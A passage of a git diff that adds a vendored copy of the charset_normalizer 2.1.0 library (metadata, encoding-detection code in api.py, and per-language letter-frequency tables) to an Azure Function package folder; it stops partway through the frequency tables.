+charset_normalizer/version.py,sha256=aHhGbxCxD3_nEElAoNbMRqmGpyqLWCYkGvbAEHl34rM,79
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/WHEEL
new file mode 100644
index 0000000..153494e
--- /dev/null
+++
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/entry_points.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/entry_points.txt new file mode 100644 index 0000000..87597a1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/entry_points.txt @@ -0,0 +1,3 @@ +[console_scripts] +normalizer = charset_normalizer.cli.normalizer:cli_detect + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/top_level.txt new file mode 100644 index 0000000..b7e94c9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/top_level.txt @@ -0,0 +1 @@ +charset_normalizer diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__init__.py new file mode 100644 index 0000000..d9a6d71 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__init__.py @@ -0,0 +1,56 @@ +# -*- coding: utf_8 -*- +""" +Charset-Normalizer +~~~~~~~~~~~~~~ +The Real First Universal Charset Detector. +A library that helps you read text from an unknown charset encoding. +Motivated by chardet, This package is trying to resolve the issue by taking a new approach. +All IANA character set names for which the Python core library provides codecs are supported. + +Basic usage: + >>> from charset_normalizer import from_bytes + >>> results = from_bytes('Bсеки човек има право на образование. Oбразованието!'.encode('utf_8')) + >>> best_guess = results.best() + >>> str(best_guess) + 'Bсеки човек има право на образование. Oбразованието!' + +Others methods and usages are available - see the full documentation +at . +:copyright: (c) 2021 by Ahmed TAHRI +:license: MIT, see LICENSE for more details. 
+""" +import logging + +from .api import from_bytes, from_fp, from_path, normalize +from .legacy import ( + CharsetDetector, + CharsetDoctor, + CharsetNormalizerMatch, + CharsetNormalizerMatches, + detect, +) +from .models import CharsetMatch, CharsetMatches +from .utils import set_logging_handler +from .version import VERSION, __version__ + +__all__ = ( + "from_fp", + "from_path", + "from_bytes", + "normalize", + "detect", + "CharsetMatch", + "CharsetMatches", + "CharsetNormalizerMatch", + "CharsetNormalizerMatches", + "CharsetDetector", + "CharsetDoctor", + "__version__", + "VERSION", + "set_logging_handler", +) + +# Attach a NullHandler to the top level logger by default +# https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-library + +logging.getLogger("charset_normalizer").addHandler(logging.NullHandler()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3ab68ad Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/api.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/api.cpython-39.pyc new file mode 100644 index 0000000..f9b041f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/api.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/cd.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/cd.cpython-39.pyc new file mode 100644 index 0000000..13ffd33 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/cd.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/constant.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/constant.cpython-39.pyc new file mode 100644 index 0000000..5b6990e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/constant.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/legacy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/legacy.cpython-39.pyc new file mode 100644 index 0000000..e046acb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/legacy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/md.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/md.cpython-39.pyc new file mode 100644 index 0000000..358e2af Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/md.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/models.cpython-39.pyc new file mode 100644 index 0000000..6e54558 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..0f3a46c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/version.cpython-39.pyc new file mode 100644 index 0000000..65b5947 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__pycache__/version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/api.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/api.py new file mode 100644 index 0000000..38187d6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/api.py @@ -0,0 +1,578 @@ +import logging +from os import PathLike +from os.path import basename, splitext +from typing import BinaryIO, List, Optional, Set + +from .cd import ( + coherence_ratio, + encoding_languages, + mb_encoding_languages, + merge_coherence_ratios, +) +from .constant import IANA_SUPPORTED, TOO_BIG_SEQUENCE, TOO_SMALL_SEQUENCE, TRACE +from .md import mess_ratio +from .models import CharsetMatch, CharsetMatches +from .utils import ( + any_specified_encoding, + cut_sequence_chunks, + iana_name, + identify_sig_or_bom, + is_cp_similar, + is_multi_byte_encoding, + should_strip_sig_or_bom, +) + +# Will most likely be controversial +# logging.addLevelName(TRACE, "TRACE") +logger = logging.getLogger("charset_normalizer") +explain_handler = logging.StreamHandler() +explain_handler.setFormatter( + logging.Formatter("%(asctime)s | %(levelname)s | %(message)s") +) + + +def from_bytes( + sequences: bytes, + steps: int = 5, + chunk_size: int = 512, + threshold: float = 0.2, + cp_isolation: List[str] = None, + cp_exclusion: List[str] = None, + preemptive_behaviour: bool = True, + explain: bool = False, +) -> CharsetMatches: + """ + Given a raw bytes sequence, return the best possibles charset usable to render str objects. 
+ If there is no results, it is a strong indicator that the source is binary/not text. + By default, the process will extract 5 blocs of 512o each to assess the mess and coherence of a given sequence. + And will give up a particular code page after 20% of measured mess. Those criteria are customizable at will. + + The preemptive behavior DOES NOT replace the traditional detection workflow, it prioritize a particular code page + but never take it for granted. Can improve the performance. + + You may want to focus your attention to some code page or/and not others, use cp_isolation and cp_exclusion for that + purpose. + + This function will strip the SIG in the payload/sequence every time except on UTF-16, UTF-32. + By default the library does not setup any handler other than the NullHandler, if you choose to set the 'explain' + toggle to True it will alter the logger configuration to add a StreamHandler that is suitable for debugging. + Custom logging format and handler can be set manually. + """ + + if not isinstance(sequences, (bytearray, bytes)): + raise TypeError( + "Expected object of type bytes or bytearray, got: {0}".format( + type(sequences) + ) + ) + + if explain: + previous_logger_level: int = logger.level + logger.addHandler(explain_handler) + logger.setLevel(TRACE) + + length: int = len(sequences) + + if length == 0: + logger.debug("Encoding detection on empty bytes, assuming utf_8 intention.") + if explain: + logger.removeHandler(explain_handler) + logger.setLevel(previous_logger_level or logging.WARNING) + return CharsetMatches([CharsetMatch(sequences, "utf_8", 0.0, False, [], "")]) + + if cp_isolation is not None: + logger.log( + TRACE, + "cp_isolation is set. use this flag for debugging purpose. " + "limited list of encoding allowed : %s.", + ", ".join(cp_isolation), + ) + cp_isolation = [iana_name(cp, False) for cp in cp_isolation] + else: + cp_isolation = [] + + if cp_exclusion is not None: + logger.log( + TRACE, + "cp_exclusion is set. use this flag for debugging purpose. " + "limited list of encoding excluded : %s.", + ", ".join(cp_exclusion), + ) + cp_exclusion = [iana_name(cp, False) for cp in cp_exclusion] + else: + cp_exclusion = [] + + if length <= (chunk_size * steps): + logger.log( + TRACE, + "override steps (%i) and chunk_size (%i) as content does not fit (%i byte(s) given) parameters.", + steps, + chunk_size, + length, + ) + steps = 1 + chunk_size = length + + if steps > 1 and length / steps < chunk_size: + chunk_size = int(length / steps) + + is_too_small_sequence: bool = len(sequences) < TOO_SMALL_SEQUENCE + is_too_large_sequence: bool = len(sequences) >= TOO_BIG_SEQUENCE + + if is_too_small_sequence: + logger.log( + TRACE, + "Trying to detect encoding from a tiny portion of ({}) byte(s).".format( + length + ), + ) + elif is_too_large_sequence: + logger.log( + TRACE, + "Using lazy str decoding because the payload is quite large, ({}) byte(s).".format( + length + ), + ) + + prioritized_encodings: List[str] = [] + + specified_encoding: Optional[str] = ( + any_specified_encoding(sequences) if preemptive_behaviour else None + ) + + if specified_encoding is not None: + prioritized_encodings.append(specified_encoding) + logger.log( + TRACE, + "Detected declarative mark in sequence. 
Priority +1 given for %s.", + specified_encoding, + ) + + tested: Set[str] = set() + tested_but_hard_failure: List[str] = [] + tested_but_soft_failure: List[str] = [] + + fallback_ascii: Optional[CharsetMatch] = None + fallback_u8: Optional[CharsetMatch] = None + fallback_specified: Optional[CharsetMatch] = None + + results: CharsetMatches = CharsetMatches() + + sig_encoding, sig_payload = identify_sig_or_bom(sequences) + + if sig_encoding is not None: + prioritized_encodings.append(sig_encoding) + logger.log( + TRACE, + "Detected a SIG or BOM mark on first %i byte(s). Priority +1 given for %s.", + len(sig_payload), + sig_encoding, + ) + + prioritized_encodings.append("ascii") + + if "utf_8" not in prioritized_encodings: + prioritized_encodings.append("utf_8") + + for encoding_iana in prioritized_encodings + IANA_SUPPORTED: + + if cp_isolation and encoding_iana not in cp_isolation: + continue + + if cp_exclusion and encoding_iana in cp_exclusion: + continue + + if encoding_iana in tested: + continue + + tested.add(encoding_iana) + + decoded_payload: Optional[str] = None + bom_or_sig_available: bool = sig_encoding == encoding_iana + strip_sig_or_bom: bool = bom_or_sig_available and should_strip_sig_or_bom( + encoding_iana + ) + + if encoding_iana in {"utf_16", "utf_32"} and not bom_or_sig_available: + logger.log( + TRACE, + "Encoding %s wont be tested as-is because it require a BOM. Will try some sub-encoder LE/BE.", + encoding_iana, + ) + continue + + try: + is_multi_byte_decoder: bool = is_multi_byte_encoding(encoding_iana) + except (ModuleNotFoundError, ImportError): + logger.log( + TRACE, + "Encoding %s does not provide an IncrementalDecoder", + encoding_iana, + ) + continue + + try: + if is_too_large_sequence and is_multi_byte_decoder is False: + str( + sequences[: int(50e4)] + if strip_sig_or_bom is False + else sequences[len(sig_payload) : int(50e4)], + encoding=encoding_iana, + ) + else: + decoded_payload = str( + sequences + if strip_sig_or_bom is False + else sequences[len(sig_payload) :], + encoding=encoding_iana, + ) + except (UnicodeDecodeError, LookupError) as e: + if not isinstance(e, LookupError): + logger.log( + TRACE, + "Code page %s does not fit given bytes sequence at ALL. %s", + encoding_iana, + str(e), + ) + tested_but_hard_failure.append(encoding_iana) + continue + + similar_soft_failure_test: bool = False + + for encoding_soft_failed in tested_but_soft_failure: + if is_cp_similar(encoding_iana, encoding_soft_failed): + similar_soft_failure_test = True + break + + if similar_soft_failure_test: + logger.log( + TRACE, + "%s is deemed too similar to code page %s and was consider unsuited already. 
Continuing!", + encoding_iana, + encoding_soft_failed, + ) + continue + + r_ = range( + 0 if not bom_or_sig_available else len(sig_payload), + length, + int(length / steps), + ) + + multi_byte_bonus: bool = ( + is_multi_byte_decoder + and decoded_payload is not None + and len(decoded_payload) < length + ) + + if multi_byte_bonus: + logger.log( + TRACE, + "Code page %s is a multi byte encoding table and it appear that at least one character " + "was encoded using n-bytes.", + encoding_iana, + ) + + max_chunk_gave_up: int = int(len(r_) / 4) + + max_chunk_gave_up = max(max_chunk_gave_up, 2) + early_stop_count: int = 0 + lazy_str_hard_failure = False + + md_chunks: List[str] = [] + md_ratios = [] + + try: + for chunk in cut_sequence_chunks( + sequences, + encoding_iana, + r_, + chunk_size, + bom_or_sig_available, + strip_sig_or_bom, + sig_payload, + is_multi_byte_decoder, + decoded_payload, + ): + md_chunks.append(chunk) + + md_ratios.append(mess_ratio(chunk, threshold)) + + if md_ratios[-1] >= threshold: + early_stop_count += 1 + + if (early_stop_count >= max_chunk_gave_up) or ( + bom_or_sig_available and strip_sig_or_bom is False + ): + break + except UnicodeDecodeError as e: # Lazy str loading may have missed something there + logger.log( + TRACE, + "LazyStr Loading: After MD chunk decode, code page %s does not fit given bytes sequence at ALL. %s", + encoding_iana, + str(e), + ) + early_stop_count = max_chunk_gave_up + lazy_str_hard_failure = True + + # We might want to check the sequence again with the whole content + # Only if initial MD tests passes + if ( + not lazy_str_hard_failure + and is_too_large_sequence + and not is_multi_byte_decoder + ): + try: + sequences[int(50e3) :].decode(encoding_iana, errors="strict") + except UnicodeDecodeError as e: + logger.log( + TRACE, + "LazyStr Loading: After final lookup, code page %s does not fit given bytes sequence at ALL. %s", + encoding_iana, + str(e), + ) + tested_but_hard_failure.append(encoding_iana) + continue + + mean_mess_ratio: float = sum(md_ratios) / len(md_ratios) if md_ratios else 0.0 + if mean_mess_ratio >= threshold or early_stop_count >= max_chunk_gave_up: + tested_but_soft_failure.append(encoding_iana) + logger.log( + TRACE, + "%s was excluded because of initial chaos probing. Gave up %i time(s). " + "Computed mean chaos is %f %%.", + encoding_iana, + early_stop_count, + round(mean_mess_ratio * 100, ndigits=3), + ) + # Preparing those fallbacks in case we got nothing. + if ( + encoding_iana in ["ascii", "utf_8", specified_encoding] + and not lazy_str_hard_failure + ): + fallback_entry = CharsetMatch( + sequences, encoding_iana, threshold, False, [], decoded_payload + ) + if encoding_iana == specified_encoding: + fallback_specified = fallback_entry + elif encoding_iana == "ascii": + fallback_ascii = fallback_entry + else: + fallback_u8 = fallback_entry + continue + + logger.log( + TRACE, + "%s passed initial chaos probing. Mean measured chaos is %f %%", + encoding_iana, + round(mean_mess_ratio * 100, ndigits=3), + ) + + if not is_multi_byte_decoder: + target_languages: List[str] = encoding_languages(encoding_iana) + else: + target_languages = mb_encoding_languages(encoding_iana) + + if target_languages: + logger.log( + TRACE, + "{} should target any language(s) of {}".format( + encoding_iana, str(target_languages) + ), + ) + + cd_ratios = [] + + # We shall skip the CD when its about ASCII + # Most of the time its not relevant to run "language-detection" on it. 
+ if encoding_iana != "ascii": + for chunk in md_chunks: + chunk_languages = coherence_ratio( + chunk, 0.1, ",".join(target_languages) if target_languages else None + ) + + cd_ratios.append(chunk_languages) + + cd_ratios_merged = merge_coherence_ratios(cd_ratios) + + if cd_ratios_merged: + logger.log( + TRACE, + "We detected language {} using {}".format( + cd_ratios_merged, encoding_iana + ), + ) + + results.append( + CharsetMatch( + sequences, + encoding_iana, + mean_mess_ratio, + bom_or_sig_available, + cd_ratios_merged, + decoded_payload, + ) + ) + + if ( + encoding_iana in [specified_encoding, "ascii", "utf_8"] + and mean_mess_ratio < 0.1 + ): + logger.debug( + "Encoding detection: %s is most likely the one.", encoding_iana + ) + if explain: + logger.removeHandler(explain_handler) + logger.setLevel(previous_logger_level) + return CharsetMatches([results[encoding_iana]]) + + if encoding_iana == sig_encoding: + logger.debug( + "Encoding detection: %s is most likely the one as we detected a BOM or SIG within " + "the beginning of the sequence.", + encoding_iana, + ) + if explain: + logger.removeHandler(explain_handler) + logger.setLevel(previous_logger_level) + return CharsetMatches([results[encoding_iana]]) + + if len(results) == 0: + if fallback_u8 or fallback_ascii or fallback_specified: + logger.log( + TRACE, + "Nothing got out of the detection process. Using ASCII/UTF-8/Specified fallback.", + ) + + if fallback_specified: + logger.debug( + "Encoding detection: %s will be used as a fallback match", + fallback_specified.encoding, + ) + results.append(fallback_specified) + elif ( + (fallback_u8 and fallback_ascii is None) + or ( + fallback_u8 + and fallback_ascii + and fallback_u8.fingerprint != fallback_ascii.fingerprint + ) + or (fallback_u8 is not None) + ): + logger.debug("Encoding detection: utf_8 will be used as a fallback match") + results.append(fallback_u8) + elif fallback_ascii: + logger.debug("Encoding detection: ascii will be used as a fallback match") + results.append(fallback_ascii) + + if results: + logger.debug( + "Encoding detection: Found %s as plausible (best-candidate) for content. With %i alternatives.", + results.best().encoding, # type: ignore + len(results) - 1, + ) + else: + logger.debug("Encoding detection: Unable to determine any suitable charset.") + + if explain: + logger.removeHandler(explain_handler) + logger.setLevel(previous_logger_level) + + return results + + +def from_fp( + fp: BinaryIO, + steps: int = 5, + chunk_size: int = 512, + threshold: float = 0.20, + cp_isolation: List[str] = None, + cp_exclusion: List[str] = None, + preemptive_behaviour: bool = True, + explain: bool = False, +) -> CharsetMatches: + """ + Same thing than the function from_bytes but using a file pointer that is already ready. + Will not close the file pointer. + """ + return from_bytes( + fp.read(), + steps, + chunk_size, + threshold, + cp_isolation, + cp_exclusion, + preemptive_behaviour, + explain, + ) + + +def from_path( + path: PathLike, + steps: int = 5, + chunk_size: int = 512, + threshold: float = 0.20, + cp_isolation: List[str] = None, + cp_exclusion: List[str] = None, + preemptive_behaviour: bool = True, + explain: bool = False, +) -> CharsetMatches: + """ + Same thing than the function from_bytes but with one extra step. Opening and reading given file path in binary mode. + Can raise IOError. 
+ """ + with open(path, "rb") as fp: + return from_fp( + fp, + steps, + chunk_size, + threshold, + cp_isolation, + cp_exclusion, + preemptive_behaviour, + explain, + ) + + +def normalize( + path: PathLike, + steps: int = 5, + chunk_size: int = 512, + threshold: float = 0.20, + cp_isolation: List[str] = None, + cp_exclusion: List[str] = None, + preemptive_behaviour: bool = True, +) -> CharsetMatch: + """ + Take a (text-based) file path and try to create another file next to it, this time using UTF-8. + """ + results = from_path( + path, + steps, + chunk_size, + threshold, + cp_isolation, + cp_exclusion, + preemptive_behaviour, + ) + + filename = basename(path) + target_extensions = list(splitext(filename)) + + if len(results) == 0: + raise IOError( + 'Unable to normalize "{}", no encoding charset seems to fit.'.format( + filename + ) + ) + + result = results.best() + + target_extensions[0] += "-" + result.encoding # type: ignore + + with open( + "{}".format(str(path).replace(filename, "".join(target_extensions))), "wb" + ) as fp: + fp.write(result.output()) # type: ignore + + return result # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__init__.py new file mode 100644 index 0000000..129c424 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__init__.py @@ -0,0 +1,1122 @@ +# -*- coding: utf_8 -*- +from typing import Dict, List + +FREQUENCIES: Dict[str, List[str]] = { + "English": [ + "e", + "a", + "t", + "i", + "o", + "n", + "s", + "r", + "h", + "l", + "d", + "c", + "u", + "m", + "f", + "p", + "g", + "w", + "y", + "b", + "v", + "k", + "x", + "j", + "z", + "q", + ], + "German": [ + "e", + "n", + "i", + "r", + "s", + "t", + "a", + "d", + "h", + "u", + "l", + "g", + "o", + "c", + "m", + "b", + "f", + "k", + "w", + "z", + "p", + "v", + "ü", + "ä", + "ö", + "j", + ], + "French": [ + "e", + "a", + "s", + "n", + "i", + "t", + "r", + "l", + "u", + "o", + "d", + "c", + "p", + "m", + "é", + "v", + "g", + "f", + "b", + "h", + "q", + "à", + "x", + "è", + "y", + "j", + ], + "Dutch": [ + "e", + "n", + "a", + "i", + "r", + "t", + "o", + "d", + "s", + "l", + "g", + "h", + "v", + "m", + "u", + "k", + "c", + "p", + "b", + "w", + "j", + "z", + "f", + "y", + "x", + "ë", + ], + "Italian": [ + "e", + "i", + "a", + "o", + "n", + "l", + "t", + "r", + "s", + "c", + "d", + "u", + "p", + "m", + "g", + "v", + "f", + "b", + "z", + "h", + "q", + "è", + "à", + "k", + "y", + "ò", + ], + "Polish": [ + "a", + "i", + "o", + "e", + "n", + "r", + "z", + "w", + "s", + "c", + "t", + "k", + "y", + "d", + "p", + "m", + "u", + "l", + "j", + "ł", + "g", + "b", + "h", + "ą", + "ę", + "ó", + ], + "Spanish": [ + "e", + "a", + "o", + "n", + "s", + "r", + "i", + "l", + "d", + "t", + "c", + "u", + "m", + "p", + "b", + "g", + "v", + "f", + "y", + "ó", + "h", + "q", + "í", + "j", + "z", + "á", + ], + "Russian": [ + "о", + "а", + "е", + "и", + "н", + "с", + "т", + "р", + "в", + "л", + "к", + "м", + "д", + "п", + "у", + "г", + "я", + "ы", + "з", + "б", + "й", + "ь", + "ч", + "х", + "ж", + "ц", + ], + "Japanese": [ + "の", + "に", + "る", + "た", + "は", + "ー", + "と", + "し", + "を", + "で", + "て", + "が", + "い", + "ン", + "れ", + "な", + "年", + "ス", + "っ", + "ル", + "か", + "ら", + "あ", + "さ", + "も", + "り", + ], + "Portuguese": [ + "a", + "e", + "o", + "s", + "i", + "r", + 
"d", + "n", + "t", + "m", + "u", + "c", + "l", + "p", + "g", + "v", + "b", + "f", + "h", + "ã", + "q", + "é", + "ç", + "á", + "z", + "í", + ], + "Swedish": [ + "e", + "a", + "n", + "r", + "t", + "s", + "i", + "l", + "d", + "o", + "m", + "k", + "g", + "v", + "h", + "f", + "u", + "p", + "ä", + "c", + "b", + "ö", + "å", + "y", + "j", + "x", + ], + "Chinese": [ + "的", + "一", + "是", + "不", + "了", + "在", + "人", + "有", + "我", + "他", + "这", + "个", + "们", + "中", + "来", + "上", + "大", + "为", + "和", + "国", + "地", + "到", + "以", + "说", + "时", + "要", + "就", + "出", + "会", + ], + "Ukrainian": [ + "о", + "а", + "н", + "і", + "и", + "р", + "в", + "т", + "е", + "с", + "к", + "л", + "у", + "д", + "м", + "п", + "з", + "я", + "ь", + "б", + "г", + "й", + "ч", + "х", + "ц", + "ї", + ], + "Norwegian": [ + "e", + "r", + "n", + "t", + "a", + "s", + "i", + "o", + "l", + "d", + "g", + "k", + "m", + "v", + "f", + "p", + "u", + "b", + "h", + "å", + "y", + "j", + "ø", + "c", + "æ", + "w", + ], + "Finnish": [ + "a", + "i", + "n", + "t", + "e", + "s", + "l", + "o", + "u", + "k", + "ä", + "m", + "r", + "v", + "j", + "h", + "p", + "y", + "d", + "ö", + "g", + "c", + "b", + "f", + "w", + "z", + ], + "Vietnamese": [ + "n", + "h", + "t", + "i", + "c", + "g", + "a", + "o", + "u", + "m", + "l", + "r", + "à", + "đ", + "s", + "e", + "v", + "p", + "b", + "y", + "ư", + "d", + "á", + "k", + "ộ", + "ế", + ], + "Czech": [ + "o", + "e", + "a", + "n", + "t", + "s", + "i", + "l", + "v", + "r", + "k", + "d", + "u", + "m", + "p", + "í", + "c", + "h", + "z", + "á", + "y", + "j", + "b", + "ě", + "é", + "ř", + ], + "Hungarian": [ + "e", + "a", + "t", + "l", + "s", + "n", + "k", + "r", + "i", + "o", + "z", + "á", + "é", + "g", + "m", + "b", + "y", + "v", + "d", + "h", + "u", + "p", + "j", + "ö", + "f", + "c", + ], + "Korean": [ + "이", + "다", + "에", + "의", + "는", + "로", + "하", + "을", + "가", + "고", + "지", + "서", + "한", + "은", + "기", + "으", + "년", + "대", + "사", + "시", + "를", + "리", + "도", + "인", + "스", + "일", + ], + "Indonesian": [ + "a", + "n", + "e", + "i", + "r", + "t", + "u", + "s", + "d", + "k", + "m", + "l", + "g", + "p", + "b", + "o", + "h", + "y", + "j", + "c", + "w", + "f", + "v", + "z", + "x", + "q", + ], + "Turkish": [ + "a", + "e", + "i", + "n", + "r", + "l", + "ı", + "k", + "d", + "t", + "s", + "m", + "y", + "u", + "o", + "b", + "ü", + "ş", + "v", + "g", + "z", + "h", + "c", + "p", + "ç", + "ğ", + ], + "Romanian": [ + "e", + "i", + "a", + "r", + "n", + "t", + "u", + "l", + "o", + "c", + "s", + "d", + "p", + "m", + "ă", + "f", + "v", + "î", + "g", + "b", + "ș", + "ț", + "z", + "h", + "â", + "j", + ], + "Farsi": [ + "ا", + "ی", + "ر", + "د", + "ن", + "ه", + "و", + "م", + "ت", + "ب", + "س", + "ل", + "ک", + "ش", + "ز", + "ف", + "گ", + "ع", + "خ", + "ق", + "ج", + "آ", + "پ", + "ح", + "ط", + "ص", + ], + "Arabic": [ + "ا", + "ل", + "ي", + "م", + "و", + "ن", + "ر", + "ت", + "ب", + "ة", + "ع", + "د", + "س", + "ف", + "ه", + "ك", + "ق", + "أ", + "ح", + "ج", + "ش", + "ط", + "ص", + "ى", + "خ", + "إ", + ], + "Danish": [ + "e", + "r", + "n", + "t", + "a", + "i", + "s", + "d", + "l", + "o", + "g", + "m", + "k", + "f", + "v", + "u", + "b", + "h", + "p", + "å", + "y", + "ø", + "æ", + "c", + "j", + "w", + ], + "Serbian": [ + "а", + "и", + "о", + "е", + "н", + "р", + "с", + "у", + "т", + "к", + "ј", + "в", + "д", + "м", + "п", + "л", + "г", + "з", + "б", + "a", + "i", + "e", + "o", + "n", + "ц", + "ш", + ], + "Lithuanian": [ + "i", + "a", + "s", + "o", + "r", + "e", + "t", + "n", + "u", + "k", + "m", + "l", + "p", + "v", + "d", + "j", + "g", + "ė", + "b", + 
"y", + "ų", + "š", + "ž", + "c", + "ą", + "į", + ], + "Slovene": [ + "e", + "a", + "i", + "o", + "n", + "r", + "s", + "l", + "t", + "j", + "v", + "k", + "d", + "p", + "m", + "u", + "z", + "b", + "g", + "h", + "č", + "c", + "š", + "ž", + "f", + "y", + ], + "Slovak": [ + "o", + "a", + "e", + "n", + "i", + "r", + "v", + "t", + "s", + "l", + "k", + "d", + "m", + "p", + "u", + "c", + "h", + "j", + "b", + "z", + "á", + "y", + "ý", + "í", + "č", + "é", + ], + "Hebrew": [ + "י", + "ו", + "ה", + "ל", + "ר", + "ב", + "ת", + "מ", + "א", + "ש", + "נ", + "ע", + "ם", + "ד", + "ק", + "ח", + "פ", + "ס", + "כ", + "ג", + "ט", + "צ", + "ן", + "ז", + "ך", + ], + "Bulgarian": [ + "а", + "и", + "о", + "е", + "н", + "т", + "р", + "с", + "в", + "л", + "к", + "д", + "п", + "м", + "з", + "г", + "я", + "ъ", + "у", + "б", + "ч", + "ц", + "й", + "ж", + "щ", + "х", + ], + "Croatian": [ + "a", + "i", + "o", + "e", + "n", + "r", + "j", + "s", + "t", + "u", + "k", + "l", + "v", + "d", + "m", + "p", + "g", + "z", + "b", + "c", + "č", + "h", + "š", + "ž", + "ć", + "f", + ], + "Hindi": [ + "क", + "र", + "स", + "न", + "त", + "म", + "ह", + "प", + "य", + "ल", + "व", + "ज", + "द", + "ग", + "ब", + "श", + "ट", + "अ", + "ए", + "थ", + "भ", + "ड", + "च", + "ध", + "ष", + "इ", + ], + "Estonian": [ + "a", + "i", + "e", + "s", + "t", + "l", + "u", + "n", + "o", + "k", + "r", + "d", + "m", + "v", + "g", + "p", + "j", + "h", + "ä", + "b", + "õ", + "ü", + "f", + "c", + "ö", + "y", + ], + "Simple English": [ + "e", + "a", + "t", + "i", + "o", + "n", + "s", + "r", + "h", + "l", + "d", + "c", + "m", + "u", + "f", + "p", + "g", + "w", + "b", + "y", + "v", + "k", + "j", + "x", + "z", + "q", + ], + "Thai": [ + "า", + "น", + "ร", + "อ", + "ก", + "เ", + "ง", + "ม", + "ย", + "ล", + "ว", + "ด", + "ท", + "ส", + "ต", + "ะ", + "ป", + "บ", + "ค", + "ห", + "แ", + "จ", + "พ", + "ช", + "ข", + "ใ", + ], + "Greek": [ + "α", + "τ", + "ο", + "ι", + "ε", + "ν", + "ρ", + "σ", + "κ", + "η", + "π", + "ς", + "υ", + "μ", + "λ", + "ί", + "ό", + "ά", + "γ", + "έ", + "δ", + "ή", + "ω", + "χ", + "θ", + "ύ", + ], + "Tamil": [ + "க", + 